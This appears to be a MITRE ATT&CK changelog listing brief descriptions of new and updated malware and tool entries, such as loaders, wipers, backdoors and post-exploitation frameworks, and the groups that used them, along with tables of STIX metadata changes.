| [Bumblebee](https://attack.mitre.org/software/S1039) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://attack.mitre.org/software/S1039) has been linked to ransomware operations including [Conti](https://attack.mitre.org/software/S0575), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022) |
| Description |
|---|
| [CaddyWiper](https://attack.mitre.org/software/S0693) is a destructive data wiper that has been used in attacks against organizations in Ukraine since at least March 2022.(Citation: ESET CaddyWiper March 2022)(Citation: Cisco CaddyWiper March 2022) |
| Description |
|---|
| [CharmPower](https://attack.mitre.org/software/S0674) is a PowerShell-based, modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Check Point APT35 CharmPower January 2022) |
| Description |
|---|
| [Chinoxy](https://attack.mitre.org/software/S1041) is a backdoor that has been used since at least November 2018, during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign, to gain persistence and drop additional payloads. According to security researchers, [Chinoxy](https://attack.mitre.org/software/S1041) has been used by Chinese-speaking threat actors.(Citation: Bitdefender FunnyDream Campaign November 2020) |
| Description |
|---|
| [Chrommme](https://attack.mitre.org/software/S0667) is a backdoor tool written using the Microsoft Foundation Class (MFC) framework that was first reported in June 2021; security researchers noted infrastructure overlaps with [Gelsemium](https://attack.mitre.org/software/S0666) malware.(Citation: ESET Gelsemium June 2021) |
| Description |
|---|
| [Clambling](https://attack.mitre.org/software/S0660) is a modular backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2017.(Citation: Trend Micro DRBControl February 2020) |
| Description |
|---|
| [CreepyDrive](https://attack.mitre.org/software/S1023) is a custom implant has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.(Citation: Microsoft POLONIUM June 2022) [POLONIUM](https://attack.mitre.org/groups/G1005) has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.(Citation: Microsoft POLONIUM June 2022) |
| Description |
|---|
| [CreepySnail](https://attack.mitre.org/software/S1024) is a custom PowerShell implant that has been used by [POLONIUM](https://attack.mitre.org/groups/G1005) since at least 2022.(Citation: Microsoft POLONIUM June 2022) |
| Description |
|---|
| [Cyclops Blink](https://attack.mitre.org/software/S0687) is a modular malware that has been used in widespread campaigns by [Sandworm Team](https://attack.mitre.org/groups/G0034) since at least 2019 to target Small/Home Office (SOHO) network devices, including WatchGuard and Asus.(Citation: NCSC Cyclops Blink February 2022)(Citation: NCSC CISA Cyclops Blink Advisory February 2022)(Citation: Trend Micro Cyclops Blink March 2022) |
| Description |
|---|
| [DCSrv](https://attack.mitre.org/software/S1033) is destructive malware that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021. Though [DCSrv](https://attack.mitre.org/software/S1033) has ransomware-like capabilities, [Moses Staff](https://attack.mitre.org/groups/G1009) does not demand ransom or offer a decryption key.(Citation: Checkpoint MosesStaff Nov 2021) |
| Description |
|---|
| [DRATzarus](https://attack.mitre.org/software/S0694) is a remote access tool (RAT) that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) to target the defense and aerospace organizations globally since at least summer 2020. [DRATzarus](https://attack.mitre.org/software/S0694) shares similarities with [Bankshot](https://attack.mitre.org/software/S0239), which was used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in 2017 to target the Turkish financial sector.(Citation: ClearSky Lazarus Aug 2020) |
| Description |
|---|
| [DanBot](https://attack.mitre.org/software/S1014) is a first-stage remote access Trojan written in C# that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least 2018.(Citation: SecureWorks August 2019) |
| Description |
|---|
| [DarkWatchman](https://attack.mitre.org/software/S0673) is a lightweight JavaScript-based remote access tool (RAT) that avoids file operations; it was first observed in November 2021.(Citation: Prevailion DarkWatchman 2021) |
| Description |
|---|
| [Diavol](https://attack.mitre.org/software/S0659) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://attack.mitre.org/software/S0659) has been deployed by [Bazar](https://attack.mitre.org/software/S0534) and is thought to have potential ties to [Wizard Spider](https://attack.mitre.org/groups/G0102).(Citation: Fortinet Diavol July 2021)(Citation: FBI Flash Diavol January 2022)(Citation: DFIR Diavol Ransomware December 2021) |
| Description |
|---|
| [DnsSystem](https://attack.mitre.org/software/S1021) is a .NET based DNS backdoor, which is a customized version of the open source tool DIG.net, that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2022.(Citation: Zscaler Lyceum DnsSystem June 2022) |
| Description |
|---|
| [Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020) |
| Description |
|---|
| [Ferocious](https://attack.mitre.org/software/S0679) is a first stage implant composed of VBS and PowerShell scripts that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021) |
| Description |
|---|
| [Flagpro](https://attack.mitre.org/software/S0696) is a Windows-based, first-stage downloader that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) since at least October 2020. It has primarily been used against defense, media, and communications companies in Japan.(Citation: NTT Security Flagpro new December 2021) |
| Description |
|---|
| [FoggyWeb](https://attack.mitre.org/software/S0661) is a passive and highly-targeted backdoor capable of remotely exfiltrating sensitive information from a compromised Active Directory Federated Services (AD FS) server. It has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least early April 2021.(Citation: MSTIC FoggyWeb September 2021) |
| Description |
|---|
| [FunnyDream](https://attack.mitre.org/software/S1044) is a backdoor with multiple components that was used during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign since at least 2019, primarily for execution and exfiltration.(Citation: Bitdefender FunnyDream Campaign November 2020) |
| Description |
|---|
| [Gelsemium](https://attack.mitre.org/software/S0666) is a modular malware comprised of a dropper (Gelsemine), a loader (Gelsenicine), and main (Gelsevirine) plug-ins written using the Microsoft Foundation Class (MFC) framework. [Gelsemium](https://attack.mitre.org/software/S0666) has been used by the Gelsemium group since at least 2014.(Citation: ESET Gelsemium June 2021) |
| Description |
|---|
| [Green Lambert](https://attack.mitre.org/software/S0690) is a modular backdoor that security researchers assess has been used by an advanced threat group referred to as Longhorn and The Lamberts. First reported in 2017, the Windows variant of [Green Lambert](https://attack.mitre.org/software/S0690) may have been used as early as 2008; a macOS version was uploaded to a multiscanner service in September 2014.(Citation: Kaspersky Lamberts Toolkit April 2017)(Citation: Objective See Green Lambert for OSX Oct 2021) |
| Description |
|---|
| [HermeticWiper](https://attack.mitre.org/software/S0697) is a data wiper that has been used since at least early 2022, primarily against Ukraine with additional activity observed in Latvia and Lithuania. Some sectors targeted include government, financial, defense, aviation, and IT services.(Citation: SentinelOne Hermetic Wiper February 2022)(Citation: Symantec Ukraine Wipers February 2022)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: ESET Hermetic Wiper February 2022)(Citation: Qualys Hermetic Wiper March 2022) |
| Description |
|---|
| [HermeticWizard](https://attack.mitre.org/software/S0698) is a worm that has been used to spread [HermeticWiper](https://attack.mitre.org/software/S0697) in attacks against organizations in Ukraine since at least 2022.(Citation: ESET Hermetic Wizard March 2022) |
| Description |
|---|
| [Heyoka Backdoor](https://attack.mitre.org/software/S1027) is a custom backdoor--based on the Heyoka open source exfiltration tool--that has been used by [Aoqin Dragon](https://attack.mitre.org/groups/G1007) since at least 2013.(Citation: SentinelOne Aoqin Dragon June 2022)(Citation: Sourceforge Heyoka 2022) |
| Description |
|---|
| [IceApple](https://attack.mitre.org/software/S1022) is a modular Internet Information Services (IIS) post-exploitation framework, that has been used since at least 2021 against the technology, academic, and government sectors.(Citation: CrowdStrike IceApple May 2022) |
| Description |
|---|
| [KOCTOPUS](https://attack.mitre.org/software/S0669)'s batch variant is loader used by [LazyScripter](https://attack.mitre.org/groups/G0140) since 2018 to launch [Octopus](https://attack.mitre.org/software/S0340) and [Koadic](https://attack.mitre.org/software/S0250) and, in some cases, [QuasarRAT](https://attack.mitre.org/software/S0262). [KOCTOPUS](https://attack.mitre.org/software/S0669) also has a VBA variant that has the same functionality as the batch version.(Citation: MalwareBytes LazyScripter Feb 2021) |
| Description |
|---|
| [Kevin](https://attack.mitre.org/software/S1020) is a backdoor implant written in C++ that has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020, including in operations against organizations in Tunisia.(Citation: Kaspersky Lyceum October 2021) |
| Description |
|---|
| [LitePower](https://attack.mitre.org/software/S0680) is a downloader and second stage malware that has been used by [WIRTE](https://attack.mitre.org/groups/G0090) since at least 2021.(Citation: Kaspersky WIRTE November 2021) |
| Description |
|---|
| [Lizar](https://attack.mitre.org/software/S0681) is a modular remote access tool written using the .NET Framework that shares structural similarities to [Carbanak](https://attack.mitre.org/software/S0030). It has likely been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least February 2021.(Citation: BiZone Lizar May 2021)(Citation: Threatpost Lizar May 2021)(Citation: Gemini FIN7 Oct 2021) |
| Description |
|---|
| [MacMa](https://attack.mitre.org/software/S1016) is a macOS-based backdoor with a large set of functionalities to control and exfiltrate files from a compromised computer. [MacMa](https://attack.mitre.org/software/S1016) has been observed in the wild since November 2021.(Citation: ESET DazzleSpy Jan 2022) |
| Description |
|---|
| [Meteor](https://attack.mitre.org/software/S0688) is a wiper that was used against Iranian government organizations, including Iranian Railways, the Ministry of Roads, and Urban Development systems, in July 2021. [Meteor](https://attack.mitre.org/software/S0688) is likely a newer version of similar wipers called Stardust and Comet that were reportedly used by a group called "Indra" since at least 2019 against private companies in Syria.(Citation: Check Point Meteor Aug 2021) |
| Description |
|---|
| [Milan](https://attack.mitre.org/software/S1015) is a backdoor implant based on [DanBot](https://attack.mitre.org/software/S1014) that was written in Visual C++ and .NET. [Milan](https://attack.mitre.org/software/S1015) has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least June 2020.(Citation: ClearSky Siamesekitten August 2021)(Citation: Kaspersky Lyceum October 2021) |
| Description |
|---|
| [Mongall](https://attack.mitre.org/software/S1026) is a backdoor that has been used since at least 2013, including by [Aoqin Dragon](https://attack.mitre.org/groups/G1007).(Citation: SentinelOne Aoqin Dragon June 2022) |
| Description |
|---|
| [Mori](https://attack.mitre.org/software/S1047) is a backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022) |
| Description |
|---|
| [Mythic](https://attack.mitre.org/software/S0699) is an open source, cross-platform post-exploitation/command and control platform. [Mythic](https://attack.mitre.org/software/S0699) is designed to "plug-n-play" with various agents and communication channels.(Citation: Mythic Github)(Citation: Mythic SpecterOps)(Citation: Mythc Documentation) Deployed [Mythic](https://attack.mitre.org/software/S0699) C2 servers have been observed as part of potentially malicious infrastructure.(Citation: RecordedFuture 2021 Ad Infra) |
| Description |
|---|
| [Neoichor](https://attack.mitre.org/software/S0691) is C2 malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) since at least 2019; similar malware families used by the group include Leeson and Numbldea.(Citation: Microsoft NICKEL December 2021) |
| Description |
|---|
| [OutSteel](https://attack.mitre.org/software/S1017) is a file uploader and document stealer developed with the scripting language AutoIT that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) |
| Description |
|---|
| [Pandora](https://attack.mitre.org/software/S0664) is a multistage kernel rootkit with backdoor functionality that has been in use by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021) |
| Description |
|---|
| [PcShare](https://attack.mitre.org/software/S1050) is an open source remote access tool that has been modified and used by Chinese threat actors, most notably during the FunnyDream campaign since late 2018.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: GitHub PcShare 2014) |
| Description |
|---|
| [Peirates](https://attack.mitre.org/software/S0683) is a post-exploitation Kubernetes exploitation framework with a focus on gathering service account tokens for lateral movement and privilege escalation. The tool is written in GoLang and publicly available on GitHub.(Citation: Peirates GitHub) |
| Description |
|---|
| [PingPull](https://attack.mitre.org/software/S1031) is a remote access Trojan (RAT) written in Visual C++ that has been used by [GALLIUM](https://attack.mitre.org/groups/G0093) since at least June 2022. [PingPull](https://attack.mitre.org/software/S1031) has been used to target telecommunications companies, financial institutions, and government entities in Afghanistan, Australia, Belgium, Cambodia, Malaysia, Mozambique, the Philippines, Russia, and Vietnam.(Citation: Unit 42 PingPull Jun 2022) |
| Description |
|---|
| [PowGoop](https://attack.mitre.org/software/S1046) is a loader that consists of a DLL loader and a PowerShell-based downloader; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) as their main loader.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022) |
| Description |
|---|
| [PowerLess](https://attack.mitre.org/software/S1012) is a PowerShell-based modular backdoor that has been used by [Magic Hound](https://attack.mitre.org/groups/G0059) since at least 2022.(Citation: Cybereason PowerLess February 2022) |
| Description |
|---|
| [PowerPunch](https://attack.mitre.org/software/S0685) is a lightweight downloader that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022) |
| Description |
|---|
| [PyDCrypt](https://attack.mitre.org/software/S1032) is malware written in Python designed to deliver [DCSrv](https://attack.mitre.org/software/S1033). It has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) since at least September 2021, with each sample tailored for its intended victim organization.(Citation: Checkpoint MosesStaff Nov 2021) |
| Description |
|---|
| [QuietSieve](https://attack.mitre.org/software/S0686) is an information stealer that has been used by [Gamaredon Group](https://attack.mitre.org/groups/G0047) since at least 2021.(Citation: Microsoft Actinium February 2022) |
| Description |
|---|
| [RCSession](https://attack.mitre.org/software/S0662) is a backdoor written in C++ that has been in use since at least 2018 by [Mustang Panda](https://attack.mitre.org/groups/G0129) and by [Threat Group-3390](https://attack.mitre.org/groups/G0027) (Type II Backdoor).(Citation: Secureworks BRONZE PRESIDENT December 2019)(Citation: Trend Micro Iron Tiger April 2021)(Citation: Trend Micro DRBControl February 2020) |
| Description |
|---|
| [ROADTools](https://attack.mitre.org/software/S0684) is a framework for enumerating Azure Active Directory environments. The tool is written in Python and publicly available on GitHub.(Citation: ROADtools Github) |
| Description |
|---|
| [Rclone](https://attack.mitre.org/software/S1040) is a command line program for syncing files with cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA. [Rclone](https://attack.mitre.org/software/S1040) has been used in a number of ransomware campaigns, including those associated with the [Conti](https://attack.mitre.org/software/S0575) and DarkSide Ransomware-as-a-Service operations.(Citation: Rclone)(Citation: Rclone Wars)(Citation: Detecting Rclone)(Citation: DarkSide Ransomware Gang)(Citation: DFIR Conti Bazar Nov 2021) |
| Description |
|---|
| [SILENTTRINITY](https://attack.mitre.org/software/S0692) is an open source remote administration and post-exploitation framework primarily written in Python that includes stagers written in Powershell, C, and Boo. [SILENTTRINITY](https://attack.mitre.org/software/S0692) was used in a 2019 campaign against Croatian government agencies by unidentified cyber actors.(Citation: GitHub SILENTTRINITY March 2022)(Citation: Security Affairs SILENTTRINITY July 2019) |
| Description |
|---|
| [STARWHALE](https://attack.mitre.org/software/S1037) is Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069), possibly since at least November 2021; there is also a [STARWHALE](https://attack.mitre.org/software/S1037) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://attack.mitre.org/software/S1037) by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022) |
| Description |
|---|
| [SUGARDUMP](https://attack.mitre.org/software/S1042) is a proprietary browser credential harvesting tool that was used by UNC3890 during the [C0010](https://attack.mitre.org/campaigns/C0010) campaign. The first known [SUGARDUMP](https://attack.mitre.org/software/S1042) version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.(Citation: Mandiant UNC3890 Aug 2022) |
| Description |
|---|
| [SUGARUSH](https://attack.mitre.org/software/S1049) is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. [SUGARUSH](https://attack.mitre.org/software/S1049) was first identified during analysis of UNC3890's [C0010](https://attack.mitre.org/campaigns/C0010) campaign targeting Israeli companies, which began in late 2020.(Citation: Mandiant UNC3890 Aug 2022) |
| Description |
|---|
| [Saint Bot](https://attack.mitre.org/software/S1018) is a .NET downloader that has been used by [Ember Bear](https://attack.mitre.org/groups/G1003) since at least March 2021.(Citation: Malwarebytes Saint Bot April 2021)(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ) |
| Description |
|---|
| [Shark](https://attack.mitre.org/software/S1019) is a backdoor malware written in C# and .NET that is an updated version of [Milan](https://attack.mitre.org/software/S1015); it has been used by [HEXANE](https://attack.mitre.org/groups/G1001) since at least July 2021.(Citation: ClearSky Siamesekitten August 2021)(Citation: Accenture Lyceum Targets November 2021) |
| Description |
|---|
| [Small Sieve](https://attack.mitre.org/software/S1035) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://attack.mitre.org/groups/G0069) since at least January 2022.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: NCSC GCHQ Small Sieve Jan 2022) Security researchers have also noted [Small Sieve](https://attack.mitre.org/software/S1035)'s use by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022) |
| Description |
|---|
| [Squirrelwaffle](https://attack.mitre.org/software/S1030) is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as [Cobalt Strike](https://attack.mitre.org/software/S0154) and the [QakBot](https://attack.mitre.org/software/S0650) banking trojan.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021) |
| Description |
|---|
| [StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022) |
| Description |
|---|
| [SysUpdate](https://attack.mitre.org/software/S0663) is a backdoor written in C++ that has been used by [Threat Group-3390](https://attack.mitre.org/groups/G0027) since at least 2020.(Citation: Trend Micro Iron Tiger April 2021) |
| Description |
|---|
| [Tarrask](https://attack.mitre.org/software/S1011) is malware that has been used by [HAFNIUM](https://attack.mitre.org/groups/G0125) since at least August 2021. [Tarrask](https://attack.mitre.org/software/S1011) was designed to evade digital defenses and maintain persistence by generating concealed scheduled tasks.(Citation: Tarrask scheduled task) |
| Description |
|---|
| [ThreatNeedle](https://attack.mitre.org/software/S0665) is a backdoor that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2019 to target cryptocurrency, defense, and mobile gaming organizations. It is considered to be an advanced cluster of [Lazarus Group](https://attack.mitre.org/groups/G0032)'s Manuscrypt (a.k.a. NukeSped) malware family.(Citation: Kaspersky ThreatNeedle Feb 2021) |
| Description |
|---|
| [TinyTurla](https://attack.mitre.org/software/S0668) is a backdoor that has been used by [Turla](https://attack.mitre.org/groups/G0010) against targets in the US, Germany, and Afghanistan since at least 2020.(Citation: Talos TinyTurla September 2021) |
| Description |
|---|
| [Tomiris](https://attack.mitre.org/software/S0671) is a backdoor written in Go that continuously queries its C2 server for executables to download and execute on a victim system. It was first reported in September 2021 during an investigation of a successful DNS hijacking campaign against a Commonwealth of Independent States (CIS) member. Security researchers assess there are similarities between [Tomiris](https://attack.mitre.org/software/S0671) and [GoldMax](https://attack.mitre.org/software/S0588).(Citation: Kaspersky Tomiris Sep 2021) |
| Description |
|---|
| [Torisma](https://attack.mitre.org/software/S0678) is a second stage implant designed for specialized monitoring that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [Torisma](https://attack.mitre.org/software/S0678) was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.(Citation: McAfee Lazarus Nov 2020) |
| Description |
|---|
| [TrailBlazer](https://attack.mitre.org/software/S0682) is a modular malware that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2019.(Citation: CrowdStrike StellarParticle January 2022) |
| Description |
|---|
| [WarzoneRAT](https://attack.mitre.org/software/S0670) is a malware-as-a-service remote access tool (RAT) written in C++ that has been publicly available for purchase since at least late 2018.(Citation: Check Point Warzone Feb 2020)(Citation: Uptycs Warzone UAC Bypass November 2020) |
| Description |
|---|
| [WhisperGate](https://attack.mitre.org/software/S0689) is a multi-stage wiper designed to look like ransomware that has been used in attacks against Ukraine since at least January 2022.(Citation: Cybereason WhisperGate February 2022)(Citation: Unit 42 WhisperGate January 2022)(Citation: Microsoft WhisperGate January 2022) |
| Description |
|---|
| [Zox](https://attack.mitre.org/software/S0672) is a remote access tool that has been used by [Axiom](https://attack.mitre.org/groups/G0001) since at least 2008.(Citation: Novetta-Axiom) |
| Description |
|---|
| [ZxxZ](https://attack.mitre.org/software/S1013) is a trojan written in Visual C++ that has been used by [BITTER](https://attack.mitre.org/groups/G1002) since at least August 2021, including against Bangladeshi government personnel.(Citation: Cisco Talos Bitter Bangladesh May 2022) |
| Description |
|---|
| [ccf32](https://attack.mitre.org/software/S1043) is data collection malware that has been used since at least February 2019, most notably during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign; there is also a similar x64 version.(Citation: Bitdefender FunnyDream Campaign November 2020) |
| Description |
|---|
| [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is a Monero mining trojan that was first observed in 2018; security researchers assessed [macOS.OSAMiner](https://attack.mitre.org/software/S1048) may have been circulating since at least 2015. [macOS.OSAMiner](https://attack.mitre.org/software/S1048) is known for embedding one run-only AppleScript into another, which helped the malware evade full analysis for five years due to a lack of Apple event (AEVT) analysis tools.(Citation: SentinelLabs reversing run-only applescripts 2021)(Citation: VMRay OSAMiner dynamic analysis 2021) |
| Description |
|---|
| [ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 14:48:21.994000+00:00 | 2022-09-22 20:56:06.265000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| Description |
|---|
| [AdFind](https://attack.mitre.org/software/S0552) is a free command-line query tool that can be used for gathering information from Active Directory.(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: FireEye FIN6 Apr 2019)(Citation: FireEye Ryuk and Trickbot January 2019) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-12-29 18:04:33.254000+00:00 | 2022-09-29 20:40:24.739000+00:00 |
| external_references[1]['url'] | https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ | https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/ |
| external_references[2]['source_name'] | FireEye FIN6 Apr 2019 | FireEye Ryuk and Trickbot January 2019 |
| external_references[2]['description'] | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. | Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html | https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html |
| external_references[3]['source_name'] | FireEye Ryuk and Trickbot January 2019 | FireEye FIN6 Apr 2019 |
| external_references[3]['description'] | Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020. | McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019. |
| external_references[3]['url'] | https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html | https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Anchor](https://attack.mitre.org/software/S0504) is one of a family of backdoor malware that has been used in conjunction with [TrickBot](https://attack.mitre.org/software/S0266) on selected high profile targets since at least 2018.(Citation: Cyberreason Anchor December 2019)(Citation: Medium Anchor DNS July 2020) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-05 17:54:53.991000+00:00 | 2021-12-15 20:56:24.628000+00:00 |
| Description |
|---|
| [AppleJeus](https://attack.mitre.org/software/S0584) is a family of downloaders initially discovered in 2018 embedded within trojanized cryptocurrency applications. [AppleJeus](https://attack.mitre.org/software/S0584) has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032), targeting companies in the energy, finance, government, industry, technology, and telecommunications sectors, and several countries including the United States, United Kingdom, South Korea, Australia, Brazil, New Zealand, and Russia. [AppleJeus](https://attack.mitre.org/software/S0584) has been used to distribute the [FALLCHILL](https://attack.mitre.org/software/S0181) RAT.(Citation: CISA AppleJeus Feb 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-27 20:49:10.831000+00:00 | 2022-09-28 17:46:18.677000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [AppleSeed](https://attack.mitre.org/software/S0622) is a backdoor that has been used by [Kimsuky](https://attack.mitre.org/groups/G0094) to target South Korean government, academic, and commercial targets since at least 2021.(Citation: Malwarebytes Kimsuky June 2021) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-14 23:17:58.410000+00:00 | 2022-03-15 20:08:18.786000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| [Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) | [Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2021-12-07 18:27:04.603000+00:00 |
| description | [Arp](https://attack.mitre.org/software/S0099) displays information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) | [Arp](https://attack.mitre.org/software/S0099) displays and modifies information about a system's Address Resolution Protocol (ARP) cache. (Citation: TechNet Arp) |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| [Azorult](https://attack.mitre.org/software/S0344) is a commercial Trojan that is used to steal information from compromised hosts. [Azorult](https://attack.mitre.org/software/S0344) has been observed in the wild as early as 2016. In July 2018, [Azorult](https://attack.mitre.org/software/S0344) was seen used in a spearphishing campaign against targets in North America. [Azorult](https://attack.mitre.org/software/S0344) has been seen used for cryptocurrency theft. (Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-30 14:56:50.733000+00:00 | 2022-10-13 17:42:52.174000+00:00 |
| external_references[2]['source_name'] | Unit42 Azorult Nov 2018 | Proofpoint Azorult July 2018 |
